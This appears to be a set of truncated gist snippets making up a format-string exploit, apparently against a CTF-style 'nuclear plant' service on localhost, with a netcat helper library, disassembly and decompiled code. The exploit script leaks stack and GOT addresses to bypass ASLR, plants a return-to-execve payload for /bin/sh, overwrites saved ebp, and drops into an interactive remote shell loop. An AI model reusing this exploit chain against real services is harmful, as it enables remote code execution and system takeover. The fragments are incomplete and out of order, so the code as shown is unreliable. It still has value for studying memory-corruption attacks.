This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function validate() { | |
var x = document.forms["formxx"]["pwz"].value; | |
alert(x); | |
if (x == null || x == "") { | |
alert("Password must be filled out"); | |
return false; | |
} | |
if (!x.match(/^[A-Za-z]+$/)) { | |
alert("Bad charset"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -------------- netcatlib.py ----------------------------------- | |
import socket | |
class Netcat: | |
# TODO: ip and port should be optionaly, and an open() method should be added | |
# TODO: specify a timeout argument as well? | |
def __init__(self, ip, port): | |
self.buff = "" | |
self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
self.soc.connect((ip, port)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
call 0x80486d0 <printf@plt> | |
movl $0x8049f3a,(%esp) | |
call 0x8048750 <puts@plt> | |
mov -0xc(%ebp),%eax | |
leave ; equivalent to movl %ebp, %esp | |
; popl %ebp | |
ret |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; Dump of assembler code for function printf: | |
push %ebp ; save old frame pointer | |
mov %esp,%ebp | |
push %ebx | |
call 0xb7e8ba0f | |
add $0x10dd5b,%ebx | |
sub $0xc,%esp | |
lea 0xc(%ebp),%eax | |
mov %eax,0x8(%esp) | |
mov 0x8(%ebp),%eax |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Step 4 --- Test whether we've got our shell and let the magic happen | |
nc.write("echo \"GOT A SHELL\"\n") | |
nc.read_until("GOT A SHELL\n") | |
print "\nSUCCESS! We have a shell!\n" | |
while True: | |
command = raw_input("$ ") | |
nc.write(command + "\n") | |
# quick and dirty way to detect end of output |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Step 3 --- Exploit: trigger the payload so we get a nice shell | |
# minus 4 because leave does "mov %ebp, %esp" and then "pop %ebp" | |
target_ebp_value = location_payload - 4 | |
ebp_ho_count = ((target_ebp_value >> 16) % 0x10000) | |
ebp_lo_count = (target_ebp_value % 0x10000) | |
EXPLOIT = dword_to_bitstring(location_ebp_printf + 2) | |
EXPLOIT += dword_to_bitstring(location_ebp_printf) | |
if ebp_ho_count < ebp_lo_count: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Step 2 --- Payload: place the constructed stack which we will execute subsequently | |
PAYLOAD = dword_to_bitstring(addrexecve) # address of execve | |
PAYLOAD += "AAAA" # fake return addr | |
PAYLOAD += dword_to_bitstring(location_payload + 20) # ptr to /bin/sh | |
PAYLOAD += dword_to_bitstring(location_payload + 28) # ptr to argv | |
PAYLOAD += dword_to_bitstring(location_payload + 28) # ptr to envp | |
PAYLOAD += "/bin/sh" | |
nc.read_until("Your choice: ") | |
nc.write("1" + "\n") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Step 1c--- Get the address of execve | |
LEAKFORKADDR = dword_to_bitstring(location_got_fork) | |
LEAKFORKADDR += "%22$s:ENFORK:" | |
nc.read_until("Your choice: ") | |
nc.write("1" + "\n") | |
nc.read_until("Insert name: ") | |
nc.write(LEAKFORKADDR+"A"*(100-len(LEAKFORKADDR))+"\x01\x01"*4+"\xFF\xFF"+"\n") | |
nc.read_until("Uranium in nuclear plant \"") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import netcatlib | |
# Step 0 --- Connect to the target | |
nc = netcatlib.Netcat("localhost", 4444) | |
print "[+] Connected" | |
# Step 1a --- Defeating ASLR with information leakage: location of stack | |
INFOLEAK = "%10$p:ENDEBP:%11$p:ENDRET:" | |
nc.read_until("Your choice: ") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
int __cdecl handle_plant_creation(int a1) | |
{ | |
puts("Creating new plant.."); | |
plantid = *(_DWORD *)(a1 + 5600); | |
plant_info = (char *)(a1 + 112 * plantid); | |
memset(plant_info, 0, 112); | |
ask_for_string((int)"Insert name: ", &entered_plant_name, 0x70u); | |
*((_WORD *)plant_info + 55) = plantid; | |
[..] |